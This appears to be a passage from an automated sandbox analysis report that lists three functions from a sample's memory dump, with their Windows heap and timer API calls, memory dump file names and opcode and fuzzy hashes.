                                  Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-3336177065
                                  • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                  • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                  • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                  Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                  • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$AllocProcess
                                  • String ID:
                                  • API String ID: 1617791916-0
                                  • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                  • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                  • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                  Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                  • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                  • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710